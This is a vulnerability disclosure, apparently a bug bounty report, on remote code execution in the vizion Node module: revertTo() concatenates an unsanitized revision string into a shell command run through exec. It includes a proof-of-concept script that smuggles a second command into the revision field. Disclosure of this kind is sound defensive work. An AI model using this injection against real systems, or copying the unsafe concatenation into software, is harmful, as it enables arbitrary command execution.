Code Injection in keymetrics/vizion

Valid

Reported on

Apr 3rd 2020


Overview

The issue is an RCE triggerable through the module's revertTo() function.

This is possible because at https://github.com/keymetrics/vizion/blob/master/lib/git/git.js#L228 the git reset --hard command is built by concatenating an unsanitized input:

  var command = cliCommand(args.folder, "git reset --hard " + args.revision);

The command variable is then passed to the exec function, declared as:

var exec = require('child_process').exec;

This makes it possible for any attacker who controls the revision attribute of the object passed to <vizion_object>.revertTo() to inject shell commands, leading to the RCE impact.

Steps To Reproduce

  1. First of all, make sure your git environment is set up correctly.
  2. Execute the following commands:
       mkdir vizion # Make a new directory in which to initialize git
       cd vizion
       git init
       echo "TEST_STRING" > test.txt # Create a file named "test.txt"
       git add test.txt # Add the new file to the index
       git commit
  3. Create a PoC file like this (in the vizion directory):
       // poc.js
       var vizion = require('vizion');
       vizion.revertTo({
           revision : 'f0a1d45936cf7a3c969e4caba96546fd23255796 || touch HACKED.txt',
           folder : '.'
       }, function(err, data) {
           console.log(data);
       });
  4. Start the poc.js file: node poc.js
  5. A file named HACKED.txt will be created {F580132}
